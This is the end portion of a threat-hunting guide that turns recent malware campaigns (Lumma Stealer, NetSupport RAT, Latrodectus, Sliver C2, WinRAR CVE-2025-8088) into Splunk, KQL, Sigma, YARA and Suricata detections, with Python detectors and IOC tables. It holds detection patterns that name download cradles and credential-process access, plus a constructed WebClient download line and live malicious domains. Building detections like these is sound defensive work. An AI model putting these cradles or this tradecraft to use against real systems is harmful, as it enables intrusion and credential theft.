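BROWSE_LINES = [_mk(_BASE, off, "10.0.0.7", "198.51.100.20:443", nb) for off, nb in _BROWSE]
SAMPLE_LOG = BEACON_LINES + BROWSE_LINES


def parse_line(line: str) -> tuple[datetime, str, str, int]:
    ts, src, dst, nbytes = line.split()
    return datetime.fromisoformat(ts), src, dst, int(nbytes)


def analyze(lines, min_events: int = 8, max_cv: float = 0.3, max_median_bytes: int = 2048) -> dict:
    """Per (src, dst) flow: gap statistics and a beacon verdict.

    cv = stdev(gaps) / mean(gaps). A fixed interval gives cv near 0; a uniform
    +/-30% jitter on the interval still lands near 0.25; human browsing is
    usually well above 1. min_events guards against judging periodicity on a
    handful of connections.
    """
    flows = defaultdict(list)
    for ts, src, dst, nbytes in map(parse_line, lines):
        flows[(src, dst)].append((ts, nbytes))
    report = {}
    for key, events in flows.items():
        events.sort()
        if len(events) < min_events:
            continue
        gaps = [(b[0] - a[0]).total_seconds() for a, b in zip(events, events[1:])]
        avg = mean(gaps)
        cv = pstdev(gaps) / avg if avg > 0 else float("inf")
        med_bytes = median(nb for _, nb in events)
        report[key] = {
            "events": len(events),
            "mean_gap_s": round(avg, 1),
            "cv": round(cv, 3),
            "median_bytes": med_bytes,
            "beacon": cv <= max_cv and med_bytes <= max_median_bytes,
        }
    return report


if __name__ == "__main__":
    for flow, stats in analyze(SAMPLE_LOG).items():
        print(flow, stats)
```

On the constructed data the 8888 flow scores a gap cv of roughly 0.1 with 512-byte uploads and is flagged; the browsing flow has a cv above 1 and a median transfer of several kilobytes and is not. Tune `max_cv` upward if the frameworks you expect use heavy jitter, and run the analysis over at least a day so that sleep intervals longer than a few minutes accumulate enough events.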
T1566.002 — Phishing: Spearphishing Link (Initial Access) [P1]
Lumma Stealer campaign abuses Google Groups as redirectors to malicious infrastructure, with 4,000+ malicious groups documented
Splunk SPL:
index=* sourcetype=proxy (http_referrer="*groups.google.com*" OR http_referrer="*www.google.com/url*") | eval dest_host=lower(dest) | where NOT match(dest_host, "(^|\.)(google\.com|googleapis\.com|gstatic\.com|googleusercontent\.com)$") | eval known_bad=if(match(dest_host, "(^|\.)(healgeni\.live|zhblz\.com)$"), "yes", "no") | stats count by src_ip, user, dest_host, http_referrer, known_bad | sort -known_bad, -count
Elastic KQL:
http.request.referrer:(*groups.google.com* OR *www.google.com/url*) AND NOT url.domain:(*.google.com OR *.googleapis.com OR *.gstatic.com OR *.googleusercontent.com)
Sigma Rule:
  title: Google Groups Abuse for Malware Distribution
  id: d8a2b5c1-4e7f-3a9d-8b6c-1f2e9d7a4c5b
  status: experimental
  description: Detects requests to non-Google hosts whose referer is Google Groups or Google's outbound-link redirector, the redirect chain used by the Lumma Stealer campaign
  author: CTM360 (adapted by RedSheep Security/Stone)
  references:
    - https://www.bleepingcomputer.com/news/security/ctm360-lumma-stealer-and-ninja-browser-malware-campaign-abusing-google-groups/
  logsource:
    category: proxy
  detection:
    selection_referer:
      cs-referer|contains:
        - 'groups.google.com'
        - 'www.google.com/url'
    selection_known_bad:
      cs-host|endswith:
        - 'healgeni.live'
        - '.zhblz.com'
    filter_google:
      cs-host|endswith:
        - '.google.com'
        - '.googleapis.com'
        - '.gstatic.com'
        - '.googleusercontent.com'
    condition: selection_referer and (selection_known_bad or not filter_google)
  falsepositives:
    - Legitimate Google Groups posts linking to external sites
  level: high
  tags:
    - attack.initial_access
    - attack.t1566.002
Match on the referer rather than on the Google Groups URL itself: a rule that filters any URI containing ".google.com" will also filter the Groups request it is looking for, and never fire. The host filter uses a leading dot so that lookalikes such as a hostname beginning with docs.google.com but registered under another domain (the FancyBear pattern in the IOC table) are not treated as Google. Block known malicious domains at the DNS level.
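The referer-chain check above as code, an added example that is not part of the hunt guide or of CTM360's report: it walks constructed proxy lines (`timestamp src url referer`, `-` for no referer), keeps requests whose referer is Google Groups or the Google outbound-link redirector, and flags those whose destination is not a Google-owned host, with proper domain-suffix matching so that a lookalike host ending in another registrable domain is not whitelisted. The two IOC domains are the ones in the report; the hosts, paths and addresses are constructed.

```python
"""
Added example, not from CTM360 or this hunt guide: flags proxy requests whose
referer is Google Groups (or Google's /url redirector) and whose destination
is not a Google-owned host. The log layout ("ts src url referer") and the
sample lines are constructed; the IOC domains come from the report above.
"""
from __future__ import annotations
from urllib.parse import urlsplit

GOOGLE_DOMAINS = ("google.com", "googleapis.com", "gstatic.com", "googleusercontent.com")
KNOWN_BAD = ("healgeni.live", "zhblz.com")  # IOC domains cited above from [4] and [9]

# Constructed sample log: the third line reuses the lookalike hostname pattern from the
# IOC table to show why a substring check for "google.com" is not good enough.
SAMPLE_LOG = [
    "2026-03-24T17:11:02 10.0.0.5 https://healgeni.live/setup.exe https://groups.google.com/g/example-topic/c/abc",
    "2026-03-24T17:11:05 10.0.0.6 https://docs.google.com/document/d/1/edit https://groups.google.com/g/example-topic/c/abc",
    "2026-03-24T17:11:09 10.0.0.6 https://docs.google.com.spreadsheets.d.1ip6eeakdebmwteh36vana4hu-glaeksstsht-boujdk.zhblz.com/login https://groups.google.com/g/example-topic",
    "2026-03-24T17:12:00 10.0.0.8 https://github.com/example/repo https://www.google.com/url?q=https://github.com/example/repo",
    "2026-03-24T17:12:30 10.0.0.9 https://healgeni.live/ -",
]


def host_of(url: str) -> str:
    return (urlsplit(url).hostname or "").lower()


def in_domain(host: str, domain: str) -> bool:
    """True only for the domain itself or a real subdomain of it.

    A substring or endswith("google.com") test would accept "evil-google.com"
    and a dotted lookalike under another domain; this does not.
    """
    return host == domain or host.endswith("." + domain)


def is_google_host(host: str) -> bool:
    return any(in_domain(host, d) for d in GOOGLE_DOMAINS)


def matched_ioc(host: str):
    return next((d for d in KNOWN_BAD if in_domain(host, d)), None)


def is_groups_referer(referer: str) -> bool:
    parts = urlsplit(referer)
    host = (parts.hostname or "").lower()
    return host == "groups.google.com" or (host == "www.google.com" and parts.path == "/url")


def parse_line(line: str) -> tuple[str, str, str, str]:
    ts, src, url, referer = line.split(" ", 3)
    return ts, src, url, referer


def find_redirect_chains(lines) -> list[dict]:
    """Requests that left Google Groups (or its redirector) for a non-Google host."""
    hits = []
    for line in lines:
        ts, src, url, referer = parse_line(line)
        if not is_groups_referer(referer):
            continue  # no Groups chain on this request; direct IOC hits are a DNS-block job
        dest = host_of(url)
        if is_google_host(dest):
            continue
        ioc = matched_ioc(dest)
        hits.append({"ts": ts, "src": src, "dest": dest, "referer_host": host_of(referer),
                     "ioc": ioc, "severity": "high" if ioc else "medium"})
    return hits


if __name__ == "__main__":
    for hit in find_redirect_chains(SAMPLE_LOG):
        print(hit["severity"], hit["src"], "->", hit["dest"], hit["ioc"] or "")
```

Three of the five constructed lines are returned: the two that land on IOC domains at high severity (including the lookalike host, which a naive `"google.com" in host` check would have waved through) and the GitHub link at medium severity, which is the false-positive class the Sigma rule names. The last line, a direct visit to healgeni.live with no referer, is deliberately out of scope for this chain rule and should be caught by the DNS block.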
T1203 — Exploitation for Client Execution (Execution) [P1]
UAC-0252 exploits WinRAR vulnerability CVE-2025-8088 in phishing campaigns targeting Ukraine [5]. The bug is a path traversal during archive extraction (via alternate data streams), so the observable is WinRAR.exe writing a file outside the chosen extraction directory, typically into the user's Startup folder, and the payload runs at the next logon rather than as a WinRAR child process. WinRAR is a client application, so T1190 (public-facing application) is the wrong mapping.
Splunk SPL:
index=* sourcetype=sysmon EventCode=11 Image="*\\WinRAR.exe" TargetFilename="*\\Start Menu\\Programs\\Startup\\*" | stats count, values(TargetFilename) as dropped_files by ComputerName, User | sort -count
Elastic KQL:
event.code:11 AND process.name:"WinRAR.exe" AND file.path:*\\Programs\\Startup\\*
Sigma Rule:
  title: WinRAR Writing to Startup Folder (CVE-2025-8088 Pattern)
  id: e9f7c8d2-1a4b-5e3f-7c9d-2b8a4f6e1d3c
  status: experimental
  description: Detects WinRAR.exe creating a file in a user's Startup folder, the path-traversal outcome of CVE-2025-8088 exploitation
  author: RedSheep Security/Stone
  references:
    - https://socprime.com/blog/uac-0252-attacks-using-shadowsniff-salatstealer/
  logsource:
    category: file_event
    product: windows
  detection:
    selection:
      Image|endswith: '\WinRAR.exe'
      TargetFilename|contains: '\Start Menu\Programs\Startup\'
    condition: selection
  falsepositives:
    - A user deliberately extracting an archive into their own Startup folder
  level: high
  tags:
    - attack.execution
    - attack.t1203
    - cve.2025.8088
Patch WinRAR immediately (7.13 or later). As a secondary, lower-fidelity check, keep a process-creation query for WinRAR.exe spawning script interpreters or unsigned executables; it will not catch this CVE directly but does catch archive-delivered droppers the user double-clicks.
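Both Sysmon checks in this guide, the jp2launcher.exe side-load (T1574.002 above) and the WinRAR write into the Startup folder (this section), as one small rule evaluator; this is an added example and not code from the SANS ISC diary, SOC Prime or the hunt guide. The events, user names and the set of directories where msvcp140.dll is considered legitimate are assumptions for the example.

```python
"""
Added example, not from the SANS ISC diary, SOC Prime or this hunt guide: the
two Sysmon checks above as code, run over constructed events (Event ID 7 image
loads and Event ID 11 file creates). Paths and the allowed-DLL directories are
assumptions for the example.
"""
from __future__ import annotations
import ntpath  # handles Windows paths correctly on any host OS

# msvcp140.dll is the VC++ runtime; loads from the Java install or the system runtime dirs are normal.
SAFE_DLL_DIRS = (
    "c:\\program files\\java\\",
    "c:\\program files (x86)\\java\\",
    "c:\\windows\\system32\\",
    "c:\\windows\\syswow64\\",
)
STARTUP_MARKER = "\\start menu\\programs\\startup\\"

SAMPLE_EVENTS = [
    # Constructed: legitimate Java launcher loading the system VC++ runtime.
    {"EventID": 7, "Image": r"C:\Program Files\Java\jre-17\bin\jp2launcher.exe",
     "ImageLoaded": r"C:\Windows\System32\msvcp140.dll"},
    # Constructed: copied launcher in Temp loading a DLL dropped beside it (the SmartApeSG pattern).
    {"EventID": 7, "Image": r"C:\Users\victim\AppData\Local\Temp\jre\bin\jp2launcher.exe",
     "ImageLoaded": r"C:\Users\victim\AppData\Local\Temp\jre\bin\msvcp140.dll"},
    # Constructed: WinRAR writing a shortcut into the Startup folder (CVE-2025-8088 outcome).
    {"EventID": 11, "Image": r"C:\Program Files\WinRAR\WinRAR.exe",
     "TargetFilename": r"C:\Users\victim\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Updater.lnk"},
    # Constructed: ordinary extraction into Downloads.
    {"EventID": 11, "Image": r"C:\Program Files\WinRAR\WinRAR.exe",
     "TargetFilename": r"C:\Users\victim\Downloads\report\report.pdf"},
]


def _norm(path: str) -> str:
    return path.replace("/", "\\").lower()


def check_sideload(ev: dict):
    """T1574.002: jp2launcher.exe loading msvcp140.dll from outside the allowed directories."""
    if ev.get("EventID") != 7:
        return None
    image, loaded = _norm(ev["Image"]), _norm(ev["ImageLoaded"])
    if ntpath.basename(image) != "jp2launcher.exe" or ntpath.basename(loaded) != "msvcp140.dll":
        return None
    if loaded.startswith(SAFE_DLL_DIRS):
        return None
    same_dir = ntpath.dirname(image) == ntpath.dirname(loaded)
    hint = " (same directory as the executable: classic side-load)" if same_dir else ""
    return f"T1574.002 jp2launcher.exe loaded msvcp140.dll from {ntpath.dirname(loaded)}{hint}"


def check_winrar_startup(ev: dict):
    """T1203: WinRAR.exe creating a file inside a Startup folder."""
    if ev.get("EventID") != 11 or ntpath.basename(_norm(ev["Image"])) != "winrar.exe":
        return None
    if STARTUP_MARKER in _norm(ev["TargetFilename"]):
        return f"T1203 WinRAR.exe wrote {ev['TargetFilename']} (CVE-2025-8088 path-traversal outcome)"
    return None


RULES = (check_sideload, check_winrar_startup)


def run_rules(events) -> list[str]:
    hits = []
    for ev in events:
        for rule in RULES:
            hit = rule(ev)
            if hit:
                hits.append(hit)
    return hits


if __name__ == "__main__":
    for hit in run_rules(SAMPLE_EVENTS):
        print(hit)
```

The legitimate System32 load and the Downloads extraction produce nothing; the Temp-directory load and the Startup write each produce one finding. Paths are lower-cased before comparison because Sysmon records them with whatever case the process supplied.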
T1055 — Process Injection (Defense Evasion, Privilege Escalation) [P2]
LummaC2 operates in memory to evade detection while gathering system information
Splunk SPL:
index=* sourcetype=sysmon (EventCode=8 OR EventCode=10) | eval suspicious_source=case(match(SourceImage, "(?i)(rundll32|regsvr32|mshta|powershell|wscript|cscript)\.exe"), 1, 1=1, 0) | eval suspicious_target=case(match(TargetImage, "(?i)(lsass|csrss|services|winlogon|explorer)\.exe"), 1, 1=1, 0) | where suspicious_source=1 OR suspicious_target=1 | stats count by EventCode, SourceImage, TargetImage, ComputerName | sort -count
Elastic KQL:
(event.code:8 OR event.code:10) AND (process.name:(rundll32.exe OR regsvr32.exe OR mshta.exe OR powershell.exe OR wscript.exe OR cscript.exe) OR process.target.name:(lsass.exe OR csrss.exe OR services.exe OR winlogon.exe OR explorer.exe))
Sigma Rule:
  title: Suspicious Process Access Patterns
  id: f1a9d7e3-8c2b-4a5e-6f9c-3d8b7e2a1c4f
  status: stable
  description: Detects process injection patterns commonly used by infostealers like LummaC2
  author: CISA (adapted by RedSheep Security/Stone)
  references:
    - https://www.cisa.gov/news-events/cybersecurity-advisories/aa25-141b
  logsource:
    product: windows
    service: sysmon
  detection:
    selection_access:
      EventID: 10
      GrantedAccess|contains:
        - '0x1F0FFF'  # PROCESS_ALL_ACCESS
        - '0x1410'    # PROCESS_VM_READ | PROCESS_QUERY_INFORMATION
    selection_injection:
      EventID: 8
    suspicious_source:
      SourceImage|endswith:
        - '\rundll32.exe'
        - '\regsvr32.exe'
        - '\mshta.exe'
    high_value_target:
      TargetImage|endswith:
        - '\lsass.exe'
        - '\csrss.exe'
    condition: (selection_access or selection_injection) and (suspicious_source or high_value_target)
  falsepositives:
    - Security software
    - System management tools
  level: high
  tags:
    - attack.defense_evasion
    - attack.privilege_escalation
    - attack.t1055
Focus on process access to LSASS and injection from scripting hosts. Whitelist known security tools.
T1082 — System Information Discovery (Discovery) [P3]
LummaC2 and other stealers enumerate system information before exfiltration
Splunk SPL:
index=* (sourcetype=sysmon OR sourcetype=wineventlog) (EventCode=1 OR EventCode=4688) (CommandLine="*systeminfo*" OR CommandLine="*wmic*" OR CommandLine="*Get-ComputerInfo*" OR CommandLine="*Get-WmiObject*Win32_*") | bucket _time span=5m | stats count, dc(CommandLine) as unique_commands by _time, ComputerName, user | where unique_commands > 3 | sort -count
Elastic KQL:
event.code:(1 OR 4688) AND process.command_line:(*systeminfo* OR *wmic* OR *Get-ComputerInfo* OR *Get-WmiObject*Win32_*)
Sigma Rule:
  title: Rapid System Enumeration Activity
  id: a8c5f9d1-2b7e-4f3a-8e6d-1c9f7a2b5d4e
  status: experimental
  description: Detects rapid execution of multiple system enumeration commands indicative of infostealer activity
  author: RedSheep Security/Stone
  logsource:
    category: process_creation
    product: windows
  detection:
    selection:
      CommandLine|contains:
        - 'systeminfo'
        - 'wmic '
        - 'Get-ComputerInfo'
        - 'Get-WmiObject'
        - 'Get-CimInstance'
        - 'query user'
        - 'net config'
        - 'ipconfig /all'
    timeframe: 5m
    condition: selection | count() by ComputerName > 5
  falsepositives:
    - System administration scripts
    - Inventory tools
  level: medium
  tags:
    - attack.discovery
    - attack.t1082
Baseline normal admin activity. Alert on rapid enumeration from non-admin accounts or unusual processes.
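The windowed count the Sigma rule above relies on, as an added example that is not part of the original article: it applies the rule's CommandLine patterns and threshold to constructed process-creation events (sample hosts, users and timestamps are invented) and reports hosts whose enumeration-command count exceeds the threshold within any 5-minute window.

```python
"""Rapid system-enumeration detector (added example, not from the article).
Mirrors the T1082 Sigma rule: count enumeration commands per host inside a
sliding 5-minute window and flag hosts whose count exceeds the threshold."""
from collections import defaultdict
from datetime import datetime, timedelta

# Substrings taken from the Sigma rule's CommandLine|contains list.
ENUM_PATTERNS = ("systeminfo", "wmic ", "Get-ComputerInfo", "Get-WmiObject",
                 "Get-CimInstance", "query user", "net config", "ipconfig /all")
WINDOW = timedelta(minutes=5)
THRESHOLD = 5  # Sigma: count() by ComputerName > 5


def is_enumeration(command_line):
    """True when the command line contains any enumeration pattern (case-insensitive)."""
    lowered = command_line.lower()
    return any(p.lower() in lowered for p in ENUM_PATTERNS)


def rapid_enumeration_hosts(events, window=WINDOW, threshold=THRESHOLD):
    """Return {host: peak_count} for hosts whose enumeration-command count in any
    window of `window` length exceeds `threshold`.
    `events` is an iterable of (timestamp, host, user, command_line) tuples."""
    per_host = defaultdict(list)
    for ts, host, _user, cmd in events:
        if is_enumeration(cmd):
            per_host[host].append(ts)
    flagged = {}
    for host, stamps in per_host.items():
        stamps.sort()
        start, peak = 0, 0
        for end, ts in enumerate(stamps):  # slide the window over sorted timestamps
            while ts - stamps[start] > window:
                start += 1
            peak = max(peak, end - start + 1)
        if peak > threshold:
            flagged[host] = peak
    return flagged


# Constructed sample events (not real telemetry): one noisy workstation and one
# inventory server that runs a single WMI query every ten minutes.
T0 = datetime(2026, 4, 7, 9, 0, 0)
SAMPLE_EVENTS = [(T0 + timedelta(seconds=s), "WS-0142", "jdoe", cmd) for s, cmd in [
    (0, "cmd.exe /c systeminfo"), (4, "wmic os get caption"),
    (7, 'powershell -c "Get-ComputerInfo"'), (9, "query user"),
    (12, "net config workstation"), (15, "ipconfig /all"), (20, "cmd.exe /c whoami"),
]] + [(T0 + timedelta(minutes=m), "SRV-INV01", "svc_inventory", "wmic product get name")
      for m in range(0, 60, 10)]
```

Running `rapid_enumeration_hosts(SAMPLE_EVENTS)` flags only the workstation (six enumeration commands in twenty seconds); the inventory server never has more than one query in any 5-minute window.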
T1140 — Deobfuscate/Decode Files or Information (Defense Evasion) [P3]
Latrodectus pads its JavaScript with large junk variables carrying names like var_Apple_Palantir38 to evade static analysis
Splunk SPL:
```
index=* (sourcetype=powershell OR sourcetype=javascript_logs) | rex field=ScriptBlockText max_match=0 "(?<junk_vars>var_[A-Za-z]+_[A-Za-z]+[0-9]+)" | where mvcount(junk_vars) > 10 | eval script_length=len(ScriptBlockText) | where script_length > 10000 | stats count by ComputerName, user | sort -count
```
Elastic KQL:
```
script.content:*var_*_* AND script.length:[10000 TO *]
```
Sigma Rule:
```yaml
title: Latrodectus-style JavaScript Obfuscation
id: b7d4e8c2-5f1a-4e8b-9c3d-7a2f6b8e1d5c
status: experimental
description: Detects JavaScript with Latrodectus-style junk variable patterns used for evasion
author: RedSheep Security/Stone
references:
  - https://unit42.paloaltonetworks.com/preventing-clickfix-attack-vector/
logsource:
  product: windows
  category: ps_script  # ScriptBlockText is populated by PowerShell Script Block Logging (EventID 4104), not by webserver logs
detection:
  selection:
    ScriptBlockText|re: 'var_[A-Za-z]+_[A-Za-z]+[0-9]+'
  large_script:
    ScriptLength|gt: 10000  # numeric comparison modifier; the literal string '>10000' never matches
  condition: selection and large_script
falsepositives:
  - Minified legitimate JavaScript
level: medium
tags:
  - attack.defense_evasion
  - attack.t1140
  - attack.t1027
```
Focus on scripts with repetitive var_ patterns combined with download functions. May require tuning based on legitimate web app traffic.
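The combined check this note describes (repetitive var_ names plus a download function plus a large body), as an added example that is not part of the original article: it scores constructed script text, with the junk-name regex and thresholds taken from the Splunk query above and the download primitives from this page's Latrodectus_JS_Downloader YARA rule; the sample scripts are built inline and are not real Latrodectus samples.

```python
"""Latrodectus-style junk-variable scorer (added example, not from the article).
Implements the T1140 logic: many var_<Word>_<Word><N> names, a script body over
10 KB, and a download primitive present in the same script block."""
import re

JUNK_VAR = re.compile(r"var_[A-Za-z]+_[A-Za-z]+[0-9]+")
# Download primitives listed in the page's Latrodectus_JS_Downloader YARA rule.
DOWNLOAD_FUNCS = ("Invoke-WebRequest", "Invoke-RestMethod", "Start-BitsTransfer",
                  "System.Net.WebClient", "FromBase64String")
MIN_JUNK_VARS = 10   # Splunk: mvcount(junk_vars) > 10
MIN_LENGTH = 10_000  # Splunk: script_length > 10000


def score_script(script):
    """Return the three signals and a verdict for one script block."""
    junk_vars = len(JUNK_VAR.findall(script))  # occurrences, like Splunk's mvcount
    lowered = script.lower()
    has_download = any(f.lower() in lowered for f in DOWNLOAD_FUNCS)
    flagged = junk_vars > MIN_JUNK_VARS and len(script) > MIN_LENGTH and has_download
    return {"junk_vars": junk_vars, "length": len(script),
            "has_download": has_download, "flagged": flagged}


def build_sample(junk_count, with_cradle):
    """Constructed script text imitating the pattern (not a real Latrodectus sample).
    Each junk variable carries a 700-byte filler so that 15 of them exceed 10 KB."""
    words = ["Apple", "Palantir", "Banana", "Cobalt", "Delta", "Echo"]
    filler = "x" * 700
    lines = []
    for i in range(junk_count):
        name = f"var_{words[i % len(words)]}_{words[(i + 1) % len(words)]}{i}"
        lines.append(f'var {name} = "{filler}";')
    if with_cradle:
        lines.append("$c = New-Object System.Net.WebClient; $c.DownloadFile($u, 'x.msi')")
    return "\n".join(lines)


SUSPICIOUS = build_sample(junk_count=15, with_cradle=True)
BENIGN = build_sample(junk_count=3, with_cradle=False)

if __name__ == "__main__":
    for label, text in (("suspicious", SUSPICIOUS), ("benign", BENIGN)):
        print(label, score_script(text))
```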
Indicators of Compromise
| Type | Value | Context |
|---|---|---|
| ip | 193.29.13.179 | Sliver C2 server observed communicating over port 8888 using mTLS |
| domain | healgeni.live | Lumma Stealer C2 infrastructure distributed via Google Groups campaign |
| domain | docusign.sa.com | Fake domain distributing NetSupport RAT in SmartApeSG campaign |
| domain | oktacheck.it.com | Fake domain distributing NetSupport RAT in SmartApeSG campaign |
| domain | hgame33.com | Hosting Mirai malware files, linked to Stan Ghouls campaign |
| domain | docs.google.com.spreadsheets.d.1ip6eeakdebmwteh36vana4hu-glaeksstsht-boujdk.zhblz.com | FancyBear phishing domain mimicking Google Docs |
| filename | jp2launcher.exe | Legitimate JRE component abused for DLL sideloading in SmartApeSG campaign |
| filename | msvcp140.dll | Malicious DLL sideloaded by jp2launcher.exe in SmartApeSG campaign |
| filename | client32.exe | NetSupport RAT executable deployed in SmartApeSG campaign |
IOC Sweep Queries (Splunk):
```
index=* (dest_ip="193.29.13.179" OR src_ip="193.29.13.179") | stats count by sourcetype, dest_port, bytes_out | sort -count
index=* (dest="healgeni.live" OR query="healgeni.live" OR url="*healgeni.live*") | stats count by sourcetype, src_ip, user | sort -count
index=* (dest="docusign.sa.com" OR query="docusign.sa.com" OR url="*docusign.sa.com*") | stats count by sourcetype, src_ip, user | sort -count
index=* (dest="oktacheck.it.com" OR query="oktacheck.it.com" OR url="*oktacheck.it.com*") | stats count by sourcetype, src_ip, user | sort -count
index=* (dest="hgame33.com" OR query="hgame33.com" OR url="*hgame33.com*") | stats count by sourcetype, src_ip, user | sort -count
index=* (dest="*zhblz.com" OR query="*zhblz.com" OR url="*zhblz.com*") | stats count by sourcetype, src_ip, user, url | sort -count
index=* (Image="*jp2launcher.exe" OR process_name="jp2launcher.exe" OR file_name="jp2launcher.exe") | stats count by ComputerName, file_path, process_path | sort -count
index=* (ImageLoaded="*msvcp140.dll" OR file_name="msvcp140.dll") | search NOT file_path="*\\System32\\*" | stats count by ComputerName, file_path, file_hash | sort -count
index=* (Image="*client32.exe" OR process_name="client32.exe" OR file_name="client32.exe") | stats count by ComputerName, file_path, file_hash, user | sort -count
```
YARA Rules
SmartApeSG_DLL_Sideloading — Detects jp2launcher.exe and msvcp140.dll combination used in SmartApeSG campaign
```yara
rule SmartApeSG_DLL_Sideloading
{
    meta:
        description = "Detects jp2launcher.exe with suspicious msvcp140.dll for SmartApeSG campaign"
        author = "RedSheep Security/Stone"
        date = "2026-04-07"
        reference = "https://isc.sans.edu/diary/32826"
    strings:
        $launcher = "jp2launcher.exe" ascii wide nocase
        $dll = "msvcp140.dll" ascii wide nocase
        $java_sig = "Oracle Corporation" ascii wide
        $suspicious_export1 = "StartRAT" ascii
        $suspicious_export2 = "InstallPayload" ascii
        $suspicious_string1 = "client32.exe" ascii wide
        $suspicious_string2 = "NetSupport" ascii wide
    condition:
        uint16(0) == 0x5A4D and
        (($launcher and not $java_sig) or
         ($dll and any of ($suspicious_*)))
}
```
Latrodectus_JS_Downloader — Detects Latrodectus JavaScript downloaders with characteristic obfuscation patterns
```yara
rule Latrodectus_JS_Downloader
{
    meta:
        description = "Detects Latrodectus JavaScript downloaders with junk variable patterns"
        author = "Unit42 (adapted by RedSheep Security/Stone)"
        date = "2026-04-07"
        reference = "https://unit42.paloaltonetworks.com/preventing-clickfix-attack-vector/"
    strings:
        $junk_pattern = /var_[A-Za-z]+_[A-Za-z]+[0-9]{1,3}/ ascii wide
        $download1 = "Invoke-WebRequest" ascii wide nocase
        $download2 = "Invoke-RestMethod" ascii wide nocase
        $download3 = "Start-BitsTransfer" ascii wide nocase
        $download4 = "System.Net.WebClient" ascii wide
        $msi_pattern = /\.msi["'\s]/ ascii wide nocase
        $b64_pattern = "FromBase64String" ascii wide
    condition:
        // every declared string must be referenced, otherwise YARA refuses to compile the rule
        (#junk_pattern > 10) and
        (any of ($download*) or $msi_pattern or $b64_pattern) and
        filesize > 10KB and filesize < 500KB
}
```
NetSupport_RAT_Config — Detects NetSupport RAT client32.exe and configuration patterns
```yara
rule NetSupport_RAT_Config
{
    meta:
        description = "Detects NetSupport RAT client32.exe and configuration"
        author = "RedSheep Security/Stone"
        date = "2026-04-07"
        reference = "https://gbhackers.com/hackers-exploit-clickfix-tactics/"
    strings:
        $exe = "client32.exe" ascii wide nocase
        $config1 = "NSM.ini" ascii wide nocase
        $config2 = "client32.ini" ascii wide nocase
        $netsupport1 = "NetSupport Manager" ascii wide
        $netsupport2 = "NetSupport Ltd" ascii wide
        $mutex = "NSMTCPIP32" ascii wide
        $port = { 7C 15 00 00 } // Port 5500 (0x157C) as a 32-bit little-endian DWORD
    condition:
        uint16(0) == 0x5A4D and
        ($exe or any of ($config*)) and
        (any of ($netsupport*) or $mutex or $port)
}
```
Suricata Rules
SID 1000001 — Detects Sliver C2 mTLS traffic on port 8888 to 193.29.13.179
```
alert tls $HOME_NET any -> 193.29.13.179 8888 (msg:"ET MALWARE Sliver C2 mTLS Communication to Known Server"; flow:to_server,established; tls.sni; content:!".google.com"; content:!".microsoft.com"; reference:url,rapid7.com/blog/post/2024/02/15/rce-to-sliver-ir-tales-from-the-field/; classtype:trojan-activity; sid:1000001; rev:1;)
```
SID 1000002 — Detects HTTP traffic to Lumma Stealer C2 domain healgeni.live
```
alert http $HOME_NET any -> any any (msg:"ET MALWARE Lumma Stealer C2 Domain healgeni.live in HTTP"; flow:to_server,established; http.host; content:"healgeni.live"; reference:url,bleepingcomputer.com/news/security/ctm360-lumma-stealer-and-ninja-browser-malware-campaign-abusing-google-groups/; classtype:trojan-activity; sid:1000002; rev:1;)
```
SID 1000003 — Detects DNS queries for fake NetSupport RAT domains
```
alert dns $HOME_NET any -> any 53 (msg:"ET MALWARE DNS Query for Fake NetSupport RAT Domain"; dns.query; content:"docusign.sa.com"; nocase; reference:url,gbhackers.com/hackers-exploit-clickfix-tactics/; classtype:trojan-activity; sid:1000003; rev:1;)
```
SID 1000004 — Detects DNS queries for fake Okta phishing domain
```
alert dns $HOME_NET any -> any 53 (msg:"ET MALWARE DNS Query for Fake Okta Domain oktacheck.it.com"; dns.query; content:"oktacheck.it.com"; nocase; reference:url,gbhackers.com/hackers-exploit-clickfix-tactics/; classtype:trojan-activity; sid:1000004; rev:1;)
```
SID 1000005 — Detects a repeated POST beaconing pattern to external hosts. The rule itself does not check for Russian ASNs, so narrow $EXTERNAL_NET to the hosting ranges from the report, or pair it with an IP reputation list, before deploying it broadly
```
alert http $HOME_NET any -> $EXTERNAL_NET any (msg:"ET MALWARE Possible C2 Beacon to Russian Hosting Infrastructure"; flow:to_server,established; http.method; content:"POST"; http.uri; pcre:"/^\/(api|update|check|beacon|ping|cmd)/i"; threshold:type both, track by_src, count 5, seconds 300; reference:url,hunt.io/blog/russian-malicious-infrastructure-c2-servers-mapped; classtype:trojan-activity; sid:1000005; rev:1;)
```
Data Source Requirements
| Source | Required For | Notes |
|---|---|---|
| Sysmon | T1574.002, T1059.001, T1071.001, T1190, T1055, T1082 | EventID 1 (Process Create), EventID 7 (Image Load), EventID 8 (CreateRemoteThread), EventID 10 (ProcessAccess) required |
| PowerShell Script Block Logging | T1059.001, T1082, T1140 | EventID 4104 required for detecting obfuscated scripts and download cradles |
| Windows Security | T1574.002, T1059.001, T1190, T1082 | EventID 4688 (Process Creation) with command line auditing enabled |
| Proxy Logs | T1071.001, T1566.002, T1140 | Required for detecting C2 beaconing patterns and Google Groups abuse |
| DNS Logs | T1071.001, T1566.002 | Critical for detecting lookups to malicious domains |
| Firewall Logs | T1071.001 | Outbound connection monitoring to Russian ASNs and specific ports |
| EDR Telemetry | T1574.002, T1055, T1190 | Memory events, DLL loads, and process injection detection |
Sources
- Exposing Russian Malicious Infrastructure: 1,250+ C2 Servers Mapped Across 165 Providers
- 1,250+ C2 Servers Mapped Across Russian Hosting Across 165 Providers
- Fix the Click: Preventing the ClickFix Attack Vector
- CTM360: Lumma Stealer and Ninja Browser malware campaign abusing Google Groups
- UAC-0252 Attack Detection: SHADOWSNIFF and SALATSTEALER Fuel Phishing Campaigns in Ukraine
- SmartApeSG campaign pushes Remcos RAT, NetSupport RAT, StealC, and Sectop RAT
- Threat Actors Deploy LummaC2 Malware to Exfiltrate Sensitive Data from Organizations
- Russian Military Cyber Actors Target US and Global Critical Infrastructure
- FancyBear Exposed: Major OPSEC Blunder Inside Russian Espionage Ops
- Hackers Exploit ClickFix Tactics to Spread NetSupport RAT, Latrodectus, and Lumma Stealer
- Lumma Stealer, Software S1213
- RCE to Sliver: IR Tales from the Field
- Sliver, Software S0633
- Stan Ghouls attacks in Russia and Uzbekistan